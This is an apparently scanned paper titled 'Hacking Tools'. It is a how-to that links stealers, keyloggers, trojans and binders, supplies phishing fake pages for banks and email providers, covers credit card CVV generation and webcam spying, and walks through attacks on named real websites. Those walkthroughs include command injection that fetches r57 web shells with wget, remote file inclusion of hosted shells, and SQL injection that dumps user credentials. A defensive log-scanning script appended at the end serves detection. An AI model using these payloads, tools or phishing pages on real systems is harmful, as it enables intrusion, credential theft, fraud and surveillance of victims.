							                                               HACKING TOOLS

                                                    Dr. Hedaya Alasooly

                                     Ministry of Telecom. and Inform. Tech., Palestine
                                                     hasooly@gov.ps


                      ABSTRACT                                   There is an important course in Hacking, called
In this paper, I would like to put some of my knowledge          Certified Ethical Hacking. I advice you to go through it.
in hacking. The paper talks about many of the hacking            The course covers the following modules
tools and strategies existing today and covers mainly            Module I: Introduction to Ethical Hacking
the following: Certified Ethical Hacking Course,                 Module II: Footprinting
Stealers, Keyloggers, Trojans, Web Downloaders,                  Module III: Scanning
Sending the patch to the victim, Fake pages pages,               Module IV: Enumeration
Some other sites fake pages, Using anonymous email,              Module V: System Hacking
Hacking remote computer, Scanners, Email read                    Module VI: Trojans and Backdoors
notification and finding the email address of email              Module VII: Sniffers
sender, Checking Yahoo and MSN block and delete,                 Module VIII: Denial of Service
Opening the webcam without the person permission,                Module IX: Social Engineering
Email read notification and finding the ip address of            Module X: Session Hijacking
email sender, Using anonymous proxy, Finding                     Module XI: Hacking Web Servers
information about remote system, Using anonymous                 Module XII: Web Application Vulnerabilities
proxy, The credit card hacking, Scanning the website             Module XIII: Web Based Password Cracking
with vulnerability security scanners and getting the             Techniques
suitable exploits, Some examples attacking websites and          Module XIV: SQL Injection
using the exploits. for hacking emails, Some other sites         Module XV: Hacking Wireless Networks
fake                                                             Module XVI: Viruses
                                                                 Module XVII: Physical Security
Keywords: Certified ethical hacking, Trojans, Fake               Module XVIII: Linux Hacking
          pages, Scanners, Hacking web sites.                    Module XIX: Evading IDS, Firewalls and Honey pots
                                                                 Module XX: Buffer Overflows
1. INTRODUCTION                                                  Module XXI: Cryptography
In this paper, I would like to put some of my knowledge          Module XXII: Penetration Testing
in hacking. The paper talks about many of the hacking               The course covers a lot of important lessons and
tools and strategies existing today and covers mainly            tools regarding hacking. You can find the course
the following: Certified Ethical Hacking Course,                 material in the web site
Stealers, Keyloggers, Trojans, Web Downloaders,                  http://www.hackerz.ir/tools/ceh
Sending the patch to the victim, Fake pages for hacking          http://www.hackerz.ir/tools
emails, Some other sites fake pages, Some other sites            http://www.hackerz.ir/e-books
fake pages, Using anonymous email, Hacking remote                http://www.alm3refh.com/vb/t14377.html
computer, Scanners, Email read notification and finding             There is also a good book to teach you how to hack
the email address of email sender, Checking Yahoo and            the websites, called sites under attack.
MSN block and delete, Opening the webcam without
the person permission, Email read notification and               3. STEALERS
finding the ip address of email sender, Using                    There are some of programs that steal the passwords
anonymous proxy, Finding information about remote                and important information from the computer and send
system, Using anonymous proxy, The credit card                   them to your predefined email address, and those are
hacking, Scanning the website with vulnerability                 called stealers. I tried ProAgentV1.2 and HermanAgent
security scanners and getting the suitable exploits,             v1.0.rar and I found they are good, to notify you with
Some examples attacking websites and using the                   the information. You can download them from
exploits.                                                        http://www.trojanfrance.com/index.php?dir=Stealer/
    Note, all the internet links, especially under the site          Through the stealer editor you will create the server
www.2shared.com, we working when the paper is                    file, you shall configure it to notify you to your email
written, but the files maybe removed from the server             address. ProAgent can bind it with another file and
later, so you can download any of the mentioned tool by          change the icon for it, and what I think it encrypts it
searching for it in google.                                      also. But with the Herman agent you will need to use
                                                                 some other jointer to bind it with the created server and
2. CERTIFIED              ETHICAL          HACKING               change the icon for the created server. You can use
COURSE.                                                          microjointer or any suitable program from
http://www.trojanfrance.com/index.php?dir=Binders/                     • http://www.speedyshare.com/
                                                                       • ttp://www.4shared.com/
4. KEYLOGGERS                                                          • www.tripod.lycos.co.uk
These are tools that can log whatever the victim writes                • http://rapidshare.com
and send information to some email address. I just                     • http://www.zshare.net
tested IRAQSPY Keylogger and SC-KeyLog v2.24.exe                For example, you can look at my created servers in
and I found them are fine. You can find a lot of             http://members.lycos.co.uk/newuserxyz/mypics.zip
KeyLoggers in                                                   here are four patched in mypics.zip: ProAgent agent,
http://www.trojanfrance.com/index.php?dir=KeyLogger          Herman agent, IRAQSPY Keylogger, and SC-KeyLog.
s/                                                           You can use http://notlong.com for encrypting any file
    Regarding IRAQSPY Keylogger can be found in
http://www.speedyshare.com/227662558.html                    8. FAKE PAGES                 FOR        HACKING
    You shall configure the key logger to notify you to
your email address. Then you will need to use some
                                                                EMAILS
                                                             Another way to hack the email, is to use fake pages,
jointer to bind the created server with some file and
                                                             and ask your victim to logon through the fake page by
change the icon for it. You can use microjointer or any
                                                             some trick, which is programmed to send the user email
suitable program from
                                                             and password to your email address. There are some
http://www.trojanfrance.com/index.php?dir=Binders/
                                                             programs that can create yahoo and hotmail and gmail
                                                             fake pages. For example, Bazoka and W@B Shark v.1
5. TROJANS                                                   can be used. Bazoka v.3 is used to develop fake msn
These are programs to totally spy whatever being done        messenger. Most of such programs exist in
in the victim computer. In most programs, you will need      http://www.khayma.com/koonooz/programs.html.
to create the server after configuring it to operate in         Another easier way is to look for existing fake yahoo
some port address, and notify you in your email address      and hotmail pages designed by the others other, and
or other ways, mostly exists Proconnective notification      change the email address in the page source code to
which support reverse connection, Mail notification,         your email address. The best of what I found during my
ICQ pager notification, CGI notification. When the           search for yahoo and hotmail fake pages, You can
server is executed in the remote computer it will notify     download them from here and change the email address
you through email the name and local IP address of the       http://www.2shared.com/file/3309191/469bf976/email-
victim computer and the status of the server each time       fake-pages.html
the victim is online, information.
    You can find a lot of Trojans in
http://www.trojanfrance.com/index.php?dir=Trojans/
                                                             9. SOME OTHER SITES FAKE PAGES
                                                             There are a lot of fake pages for other sites. For
    I just worked with Optix and Prorat, which are
                                                             example, here is the fake pages for Paypal, Bank of
widely used. The IP received is the local IP address. I
                                                             Oklahoma, Chase, Deutsche Bank, Epass, Fake hotmail
got problem with notification with Subseven Gold. So I
                                                             login, Hi5, Bank of Israel, Online Banking, Western
leave it to your own trial.
                                                             Union, usa.visa.com, America Online Billing Center,
                                                             Ebay.com. Just change the email address in the source
6. WEB DOWNLOADERS                                           html code to your email address
Some of the hackers prefer instead of binding big size       http://www.2shared.com/file/3309071/d9dabecf/fake-
of the patch with an image file, which will become           pages.html
suspicious to the victim, they prefer to bind the image
file with downloader server which downloads the patch
from some site
                                                             10. USING ANONYMOUS EMAIL
                                                             You need to send to the victim an email address with
For example, you can configure the downloader to
                                                             your files or links. It is always better to send
download the patch from
                                                             anonymous email so your Ip address can't be tracked,.
http://members.lycos.co.uk/newuserxyz/mypics.zip
                                                             There are some programs to send anonymous email, and
    Then the created downloader server can be binded
                                                             I succeeded to use them to send email to my email in
with any file. and sent to the victim. There are a lot of
                                                             webmail.gov.ps, but I could not use them to send email
downloaders in
                                                             to Yahoo or Hothmail as it seems they have security
http://www.trojanfrance.com/index.php?dir=WebDownl
                                                             restrictions. Such programs are, Kaboom2 and grade.
oaders/
                                                             You can download them from
                                                             http://www.2shared.com/file/3217179/c020d1ec/anony
7. SENDING THE PATCH TO THE                                  mousemail.html
   VICTIM                                                       There are some sites that you can send through the
Now after the server is created and binded with another      anonymous emails, i.e.,
file and you changed the icon for it, you can send it to     http://cyberatlantis.com/anonymous_email.php
the victim. As the email systems don’t allow attaching       www.sendanonymousemail.net
exe files to be sent, you can put it in some site for file   http://www.willselfdestruct.com/secure/submit
sharing, the best of them                                    http://www.sharpmail.co.uk/
          • www.2shared.com
11. HACKING REMOTE COMPUTER                                   and you will get a message when the email is read and
To enter to some share in the remote computer, you will       details about the remote computer IP
write in the dos shell
# Net use \\192.168.1.25 /user:administrator                  16. USING ANONYMOUS PROXY
# Net use                                                     For the hacker, it is always necessary he works through
# Net use Z:\\192,165.1.25\c$                                 anonymous proxy. I advice to use one of the current
   Then you can see the Z drive which influence the c$        working proxy server
share                                                         http://www.ip-adress.com/Proxy_Checker/

12 SCANNERS                                                   17. PATCHING THE WEB PAGE
There a lot of scanners that can scan for a range of          I just read about patching the web pages, so when the
computers with certain open ports. Most widely used is        victim go through it the patch will be started. But the
superscanner. In addition to vulnerability tools like GFI     method did not wok with me, as the method is utilizing
and Nessus. I just saw very nice scanner that will search     some vulnerability in Windows before Windows XP, so
for certain open ports with an IP range in some country       it may work in windows up to windows 2000, not
called AsbMay_Scan. AsbMay-ProRa-Cash can be use              tested. The method use the program Godwill or the
to break the password of the patch. You can download          program noob to bind a web page with a patch. Such
many of the AsbMay tools from                                 programs can be found in
http://www.2shared.com/file/3217530/da990490/Asb-             http://www.2shared.com/file/3310016/518cead0/patch-
May.html                                                      webpage.html

   In order to check the remote system for vulnerability,     18. THE CREDIT CARD HACKING
you can use GFI LanGuard, Nessus, Shadow Security             In some hacking sites you can find some given credit
Scanner, Cgi Scanner, Microsoft Baseline Security             cards information that you can use, but most of the are
Analyzer, N-Stealth.                                          not good. There are some credit card generators that
                                                              generate credit card numbers but without CCV or
13 CHECKING YAHOO                         AND       MSN       expired date. So it is still not easy thing to get working
BLOCK AND DELETE                                              credit card number. You can test the credit card if it is
Sometimes we want to check if someone made for us             valid one from
delete or block in MSN and Yahoo. The best thing is to        wallet.yahoo.com
use the site                                                  https://usa.visa.com/personal/security/vbv/index.html
http://www.blockstatus.com/msn/stchecker                         This site can generate the CVV number
which provides information about MSN Status Checker           http://maling.freehostia.com/tools/cvv.php?SID=1ac33d
and Delete Checker, Yahoo status Checker and AIM              ad41b7c05c5911985176e83438&USER_IP=d42699e2
Status Checker and ICQ Status Checker. There are              &PHPSESSID=1ac33dad41b7c05c5911985176e83438
some other sites. You can also use the program aMSN
messenger to check if any person deleted you.                 19. FINDING INFORMATION ABOUT
                                                              REMOTE SYSTEM
14 OPENING THE WEBCAM WITHOUT                                 You can use some sites to gather information about the
THE PERSON PERMISSION                                         remote server, if the type of operating system it uses,
I just went through some topics saying it is possible to      and some information about the server administrator.
open the webcam without the messenger user                    Some of the useful sites:
permission, but I did not find a suitable program for         http://www.netcraft.com/
that. Here are some programs and you can test them.           http://www.dns411.com/
The programs are Camera Stealer, Cam Looka, yahoo             http://whois.webhosting.info
see, Cammer.
http://www.2shared.com/file/3309777/35f60d7f/camera           20. SCANNING THE WEBSITE WITH
-programs.html                                                VULNERABILITY        SECURITY
    In Google, just you can put inurl:/view/index.shtml       SCANNERS AND GETTING THE
and you can see most of the opened cams in the world.
                                                              SUITABLE EXPLOITS
                                                              After getting information about the remote system and
15. EMAIL READ NOTIFICATION AND                               scanning it, you can know the exploits that can be
FINDING THE IP ADDRESS OF EMAIL                               utilized    on    that   website      from      this    site
SENDER                                                        www.milw0rm.com
To find the sender email address, is to copy the full             When attacking a website, the first step to do is to try
header of the email and paste it in the site                  to find the security holes in the web site. For me, I
http://www.ip-adress.com/trace_email/                         found that JAAScois scanner is one of the best ones that
    To get email read notification, you can register in the   can be used to discover security holes in the web site.
sites: www.readnotify.com and www.mailtracking.com,           Other tools are, Shadow Security Scanner, N-stealth,
                                                              Lan-Guard, Nessus, Omran security scanner
                                                               After that the shell name become shell.php, we ask
After you find the security holes in some web site, you     for it from browser and we can apply any command to
can use the website http://www.milw0rm.com to get the       the server through that shell. By that we utilized one of
exploits and apply them                                     the security holes in the website powered by 3.0.4 and
                                                            we uploaded a shell to that website. By the same way
21. SOME SITES                   TO       DECRYPT           you can utilize the security holes in 4images script or
PASSWORDS                                                   guestbook script or any other scripts in the website
There are some sites that can be used to decrypt hashes
for you, here are some of them,                             22.2. EXAMPLE 2: ATTACKING WEBSITE
http://us.md5.crysm.net                                     WITH REMOTE COMMAND EXECUTION
http://md5.rednoize.com                                     SECURITY HOLE
http://ice.breaker.free.fr                                  There are 3 security holes that allow for you to upload
http://shm.hard-core.pl/md5/                                shell to the web site: Remote command execution ,
http://www.hashchecker.com                                  Remote File Inclusion and Framework
http://lasecwww.epfl.ch/%7Eoechslin/projects/ophcrack           Let see, Probe.cgi Remote Command Execution. The
http://md5.benramsey.com                                    file pobe.cgi has security hole called Remote Command
http://md5.altervista.org                                   Execution. You can find in the source code of the
http://shm.hard-core.pl                                     exploit
http://plain-text.info                                      o Proof of concept:
http://hackerscity.free.fr/index.php                        http://the-vuln.site.org/cgi-bin/probe.cgi?olddat=|id
http://www.hashchecker.com                                      We search in Google, like that, allinurl:probe.cgi.,
http://passcracking.com                                     and we get for example,
http://gdataonline.com/seekhash.php                         http://www./???.com/cgi.bin/probe.cgi?grid=ThaiGrid
http://www.milw0rm.com/md5/insert.php                           If we put          |id|., we browse for example
http://md5.rednoize.com                                     ww.???.com/cgi.bin/probe.cgi?grid=|id|, we get for
http://passcracking.com/                                    example, uid=99(www) gid=99(www)
                                                                If        you            put      pwd         instead,
22.   SOME   EXAMPLES    FOR                                www.???.com/cgi.bin/probe.cgi?grid=|pwd|, we get,
                                                            /home/.???/cgi.bin. We want to return back one
ATTACKING WEBSITES AND USING
                                                            directory and see the permission in that directory
THE EXPLOITS                                                www.???.com/cgi.bin/probe.cgi?grid=|cd
22.1. EXAMPLE 1: ATTACKING WEBSITE                          /home/.???/;ls%20-al|
POWERED BY VBULLETIN 3.04                                       We see which directory has a permission
For example, website that we can apply this exploit on      drwxrwxrwx so we upload a shell on it, i.e., it was
it                                                          uploads. Now we change to that directory and upload
http://www.milw0rm.com/exploits/818                         the shell r57shell.zip
   The exploit code not written in Perl or Php, but it is   www.???.com/cgi.bin/probe.cgi?grid=|cd
written directly,                                           /home/.???/uploads/wget www.XXX.com/r57shell.zip*|
http://site/forumdisplay.php?GLOBALS[]=1&f=2&com                To unzip the shell
ma=".system('id')."                                         www.???.com/cgi.bin/probe.cgi?grid=|cd
   We write instead of site, the website that has such      /home/.???/uploads/unzip r57shell.zip*|
hole and we wish to attack it. We put instead of id, the        You can now use the shall by browsing
Linux command we want to apply it in the server. In         www.???.com/uploads/r57shell.php
case of id, we get for example, uid=100(apache)
gid=500(apache)                     groups=500(apache)      22.3. EXAMPLE   3:   EXPLOITING
   In case of putting pwd, we get the directory we are      COMMAND EXECUTION SECURITY HOLE
on it in the server, i.e.,                                  As an example, the security hole in the script TECH-
home/domains/admin.com/public_html/vb                       NOTE.
   You can use the command ls –al to see the folders,          To search for that script in google, write inurl:/cgi-
and which folder has a permission drwxrwxrwx, and we        bin/technote. For exploiting it, we add
have to enter it by cd command, i.e. data directory.        main.cgi?down_num=5466654&board=rebarz99&com
After entering you download the shell to it                 mand=down_load&filename=rb9.txt|id|
cd home/domains/admin.com/public_html/vb/data;wget             For example it becomes,
http://members.com/shell.zip;ls -al                         http://www.loveject.com/cgi-
   Or you can use the commands curl or get or lynx          bin/technote/main.cgi?down_num=5466654&board=reb
curl -o shell.zip www.members.com/shell.zip                 arz99&command=down_load&filename=rb9.txt|id|
GET www.members.com/shell.zip > shell.zip                   Other Linux commands you can use, |ls -la|, |pwd|
lynx -source www.members.com/shell.zip > shell.zip
   You can unzip the file using the command unzip           22.4. EXAMPLE 4: UTILIZING                          SQL
cd
                                                            INJECTION SECURITY HOLE
home/domains/admin.com/public_html/vb/data;unzip
shell.zip;ls –al
The SQL injection security holes allow you to inject           Unzip it and put its folder in C. Then we bring the
commands to get information from the SQL database              exploit written in Php and paste it in the notepad with
and modify them, like usernames and passwords.                 the extension php, i.e. exploit.php. We put exploit.php
Exploiting such holes means that you will be able to           in the folder C:\bamcomplie, then we write
read a file or write a database file. Lets see, that exploit   bamcompile.exe exploit.php, we will get exploit.exe,
http://milw0rm.com/exploits/4138                               run it from DOS and you will get the way to utilize it.
    It is in the file AV Arcade 2.1b. To search for            For            example,            the             exploit
infected website with that hole, write in google               http://www.milw0rm.com/exploits/2487. Save it as
"Powered by AV Arcade 2.1b". Utilizing the security            4images.php in C:\bamcomplie. Then from the DOS
hole, by adding                                                write
/index.php?task=view_page&id=-                                 bamcompile.exe 4images.php
1%20UNION%20SELECT%201,username,password%                         You will get a file 4images.exe. When you run
20FROM%20ava_users%20WHERE%20id=1                              4images.exe you will get how you utilize it, for example
  We look for infected website, and we apply the               php 4images.php glynncountydemocraticparty.org
exploit, i.e,                                                  /4images/ -d
http://www.b9m.net//index.php?task=view_page&id=-              php 4images.php glynncountydemocraticparty.org
1%20UNION%20SELECT%201,username,password%                      /4images/ 4images_ 1 2
20FROM%20ava_users%20WHERE%20id=1                                  Now       we     can      use      it,    i.e.     for
    We get the username: HEX KSA, Password,                    glynncountydemocraticparty.org
21232f297a57a5a743894a0e4a801fc3                               The result: Outputted Hash:
    You can decrypt the password in any of the previous        7d37c580f9c36fa004af865448a6e278
sites or with John program                                        You can decrypt it. You can use the program
                                                               AppServ to compile the Php code instead of
22.5. EXAMPLE 5: UTILIZING REMOTE                              bamcompile.exe. You can download it from
FILE DISCLOSURE SECURITY HOLE                                  http://prdownloads.sourceforge.net/appserv/appserv-
We can utilize such security holes to read important           win32-2.5.9.exe?download
files in the server, i.e, in the script USP FOSS
Distribution                                                   22.8. EXAMPLE 8 USING THE EXPLOIT
http://www.milw0rm.com/exploits/3794                           WRITTEN IN PERL
    As an example, to apply the exploit in the infected        You will need to download the program ActivePerl.
site http://riemann.usp.ac.fj/~uspfoss to read passwd file     Here example how to utilize the hole in the perl script
http://riemann.usp.ac.fj/~uspfoss/user/download.php?dn         EQdkp 1.3.2. The exploit is
ld=../../../../../../etc/passwd                                http://www.milw0rm.com/exploits/4030
                                                                  We make copy and paste for that exploit and save it
22.6 EXAMPLE 6: UTILIZING REMOTE FILE                          with .pl extension, file name for example test.pl. Then
INCLUSION VULNERABILITY                                        in DOS, we write perl test.pl. The utilization i.e.
Remote file inclusion security holes allow that we add          w4ck1ng_eqdkp.pl [PATH]
php code to the server, an example for such security              You can test it to hack the website
holes                                                          dkp.fluffigemammuts.org
http://www.milw0rm.com/exploits/4221                           Test.pl dkp.fluffigemammuts.org
dork:inurl:index.php%"Submit%Articles"%"Member%
Login"%"Top%Authors"                                           22.9. EXAMPLE 9: USING THE EXPLOIT
dork:inurl:index.php?pagedb=rss                                WRITTEN IN C++
expl:index.php?page=shell?                                     The exploits that work in windows and written in C
For example                                                    starts with that
http://ulusal.by.ru/r57.txt                                    #include <wchar.h>
http://www.article-                                            #include <stdio.h>
hut.com/index.php?page=http://ulusal.by.ru/r57.txt?            #include <winsock.h>
                                                               #include <windows.h>
22.7. EXAMPLE 7: USING THE EXPLOIT                                The exploits that work in linux and written in C
WRITTEN IN PHP                                                 starts with that
There are some normal holes, so we find in the exploit         #include <netinet/in.h>
the dork and the way to utilize the security hole directly.    #include <netinet/udp.h>
But there are some holes, their exploits used some             #include <sys/socket.h>
programming language to utilize them. Here you will            #include <sys/types.h>
compile the exploit written in Php and then utilize it.           We can use the program DEV compiler or CYGEN
You need to download the program bamcompile                    to make compile for the exploits written in C. CYGEN
http://www.bambalam.se/bamcompile/download/bamco               can be download from cygwin.com
mpile1.21.zip                                                     You must save the C exploit in a file with extension
                                                               C. Then we compile the file with the command
                                                               gcc exploit.c -o exploit.exe
                                                                 We get the columns,
We get the file exploit.exe, run it and you will get the     4 Id, 6 name, 9 email, 3 country, 5 Comment, 1 ip, 10
way to utilize the security hole                             date, 11Active or not
                                                                Make connection to database
22.10. EXAMPLE 10: USING THE EXPLOIT                         http://shiamedia.com/play.php?linkid=-
WRITTEN IN HTML                                              2242+union+select+1,2,3,4,5,6,7,8,9,10,11+from+all_g
We will apply on this exploit,                               book
http://www.milw0rm.com/exploits/3818                            This will show you the results
    This security hole exists in the script the merchant     http://shiamedia.com/play.php?linkid=-
2.2.0. We copy and paste the exploit and save it in html     2242+union+select+ip,2,country,id,comment,name,7,8,
file, i.e, exploit.html, and we change the shell link only   email,date,active+from+all_gbook
    Then we open exploit.html and we put in the box the
site that has such security hole and we will be              23. CONCLUSION:
transferred to the shell on that site. Note in the html      The paper talked about many of the hacking tools and
code, has the following parameters                           strategies existing today and covered mainly the
 The directory that includes the script code: help           following: Certified Ethical Hacking Course, Stealers,
The script that has the security hole: index.php             Keyloggers, Trojans, Web Downloaders, Sending the
The hole variable: show=                                     patch to the victim, Fake pages for hacking emails,
The shell: http://casavie.net/hack/r57.txt                   Some other sites fake pages, Some other sites fake
    You can go directly to the shell by browsing for         pages, Using anonymous email, Hacking remote
example                                                      computer, Scanners, Email read notification and finding
http://the-                                                  the email address of email sender, Checking Yahoo and
merchant.org/help/index.php?show=http://casavie.net/h        MSN block and delete, Opening the webcam without
ack/r57.txt                                                  the person permission, Email read notification and
                                                             finding the ip address of email sender, Using
22.11. EXAMPLE 11: EXAMPLE ON SQL                            anonymous proxy, Finding information about remote
INJECTION VULNERABILITY                                      system, Using anonymous proxy, The credit card
This is just general simple example, the script infected     hacking, Scanning the website with vulnerability
with sql injection is play.php in some site the, link        security scanners and getting the suitable exploits,
http://shiamedia.com/play.php?linkid=2242                    Some examples for attacking websites and using the
   We note that when the number more than 11 the web         exploits.
page become blank using this link
http://shiamedia.com/play.php?linkid=2242+order+by+          24. REFERENCES:
11                                                           [1]   http://www.pal-hack.com website.
   Make the connection to database                           [2]   http://www.xp10.cc/xp10/ website
http://shiamedia.com/play.php?linkid=-                       [3]   http://www.youtue.com website
2242+union+select+1,2,3,4,5,6,7,8,9,10,11                    [4]   http://www.hackerz.ir/tools/ceh website
   To know the database name                                 [3]   www.3asfh.net/vb/ website
http://shiamedia.com/play.php?linkid=-
2242+union+select+1,2,3,4,5,database(),7,8,9,10,11
   Database name=iv. To know the user name and the
server name
http://shiamedia.com/play.php?linkid=-
2242+union+select+1,2,3,4,5,user(),7,8,9,10,11
   User name: myshia@localhost. To know the SQL
version
http://shiamedia.com/play.php?linkid=-
2242+union+select+1,2,3,4,5,version(),7,8,9,10,11
   To know all the tables
http://shiamedia.com/play.php?linkid=-
2242+union+select+1,2,3,4,5,concat_ws(0x3a3a,table_s
chema,table_name),7,8,9,10,11+from+information_sch
ema.tables
   We get for example, iv::all_gbook. The database
name iv, and the table name all gbook. To get all the
columns in that table, we write
http://shiamedia.com/play.php?linkid=-
2242+union+select+1,2,3,4,5,column_name,7,8,9,10,11
+from+information_schema.columns+where+table_na
me="all_gbook"
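
A defender's view of section 22, as an added example that is not part of the original paper: the command execution, SQL injection, file disclosure and file inclusion requests described there all leave recognisable query strings in a web server's access log. The sketch below classifies such requests; the log lines, IP addresses and the files.example host are constructed, and the rules are heuristics to tune per application, not a complete signature set.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Heuristic rules keyed by the vulnerability classes named in section 22.
RULES = {
    # Shell metacharacters or PHP execution calls inside a parameter value.
    "command-injection": re.compile(
        r"[|`]|\$\(|\b(?:system|passthru|shell_exec|exec|eval)\s*\(", re.I),
    # UNION-based extraction, schema enumeration, ORDER BY column probing.
    "sql-injection": re.compile(
        r"\bunion\s+(?:all\s+)?select\b|\binformation_schema\b|\border\s+by\s+\d+",
        re.I),
    # Two or more parent-directory steps in a value.
    "path-traversal": re.compile(r"(?:\.\.[/\\]){2,}"),
    # A parameter whose whole value is a remote URL.
    "remote-file-inclusion": re.compile(r"^\s*(?:https?|ftp)://", re.I),
}

# Common Log Format: client ... "METHOD target HTTP/x.y" status ...
REQUEST = re.compile(
    r'^(?P<client>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3})')

# Constructed sample log; every host, IP and path is a placeholder.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /play.php?linkid=2242 HTTP/1.1" 200 5120
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /cgi-bin/probe.cgi?grid=|id| HTTP/1.1" 200 40
203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /cgi-bin/probe.cgi?grid=%257Cpwd%257C HTTP/1.1" 200 38
203.0.113.20 - - [01/Jan/2024:10:01:00 +0000] "GET /forumdisplay.php?GLOBALS%5B%5D=1&f=2&comma=%22.system(%27id%27).%22 HTTP/1.1" 200 77
203.0.113.31 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20ava_users%20WHERE%20id=1 HTTP/1.1" 200 900
203.0.113.31 - - [01/Jan/2024:10:02:04 +0000] "GET /play.php?linkid=2242+order+by+11 HTTP/1.1" 200 0
203.0.113.44 - - [01/Jan/2024:10:03:00 +0000] "GET /user/download.php?dnld=../../../../../../etc/passwd HTTP/1.1" 200 1400
203.0.113.58 - - [01/Jan/2024:10:04:00 +0000] "GET /index.php?page=http://files.example/include.txt? HTTP/1.1" 200 300
198.51.100.7 - - [01/Jan/2024:10:05:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 2048
"""


def classify(target):
    """Return the sorted rule labels matched by any query parameter value."""
    labels = set()
    query = urlsplit(target).query
    for _name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double encoding.
        decoded_twice = unquote_plus(value)
        for label, rule in RULES.items():
            if rule.search(value) or rule.search(decoded_twice):
                labels.add(label)
    return sorted(labels)


def scan(log_text):
    """Return one finding per log line that matches at least one rule."""
    findings = []
    for line in log_text.splitlines():
        match = REQUEST.match(line)
        if not match:
            continue  # not a parsable request line
        labels = classify(match.group("target"))
        if labels:
            findings.append({
                "client": match.group("client"),
                "status": int(match.group("status")),
                "target": match.group("target"),
                "labels": labels,
            })
    return findings


def summarize(findings):
    """Group matched labels by client address for triage."""
    by_client = {}
    for finding in findings:
        by_client.setdefault(finding["client"], set()).update(finding["labels"])
    return {client: sorted(labels) for client, labels in by_client.items()}


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["client"], finding["status"],
              ",".join(finding["labels"]), finding["target"])
```

A 200 status on a flagged request is the case to investigate first, since it means the application served the request instead of rejecting it.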

						